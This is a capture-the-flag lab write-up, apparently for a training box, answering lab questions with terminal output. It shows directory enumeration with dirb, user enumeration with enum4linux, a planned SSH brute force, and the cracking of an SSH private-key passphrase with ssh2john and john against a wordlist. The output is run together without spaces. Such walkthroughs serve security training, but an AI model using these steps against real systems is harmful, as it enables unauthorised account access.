What is the name of the hidden directory on the web server(enter name without /)?
root@kali:~#dirbhttp://10.10.172.195-----------------DIRBv2.22ByTheDarkRaver-----------------START_TIME:MonSep2007:44:392021URL_BASE:http://10.10.172.195/WORDLIST_FILES:/usr/share/dirb/wordlists/common.txt-----------------GENERATEDWORDS:4612----ScanningURL:http://10.10.172.195/----==> DIRECTORY:http://10.10.172.195/development/+http://10.10.172.195/index.html (CODE:200|SIZE:158) +http://10.10.172.195/server-status (CODE:403|SIZE:301) ----Enteringdirectory:http://10.10.172.195/development/----(!) WARNING: Directory IS LISTABLE. No need to scan it. (Usemode'-w'ifyouwanttoscanitanyway)-----------------END_TIME:MonSep2007:44:412021DOWNLOADED:4612-FOUND:2
Answer format: development
User brute-forcing to find the username & password
after some enum i get this notes
SMB has been configured.
There is Apache struts version 2.5.12 running.
User j is using weak password which can be cracked easily.
run enum4linux
now we have 2 username kay, jan
remember jan has weak password lets brute force jan ssh
What is the name of the other user you found(all lower case)?
Answer format: kay
If you have found another user, what can you do with this information?
No answer needed
What is the final password you obtain?
try to connect with ssh ... passphrase required
i'll use ssh2hohn to extract it
root@kali:~#locatessh2john/usr/share/john/ssh2john.pyroot@kali:~#/usr/share/john/ssh2john.pyid_rsa>pass.hashroot@kali:~#sudojohn--wordlist=/usr/share/wordlists/rockyou.txt/rockyou.txtpass.hashCreateddirectory:/root/.johnUsingdefaultinputencoding:UTF-8Loaded1passwordhash (SSH [RSA/DSA/EC/OPENSSH (SSH privatekeys) 32/64])Cost1 (KDF/cipher [0=MD5/AES 1=MD5/3DES2=Bcrypt/AES]) is 0 for all loaded hashesCost2 (iteration count) is 1 for all loaded hashesWillrun2OpenMPthreadsNote:Thisformatmayemitfalsepositives,soitwillkeeptryingevenafterfindingapossiblecandidate.Press'q'orCtrl-Ctoabort,almostanyotherkeyforstatusbeeswax (id_rsa)1g0:00:00:06DONE (2021-09-20 08:38) 0.1494g/s 2143Kp/s 2143Kc/s 2143KC/sa6_123..*7¡Vamos!Sessioncompleted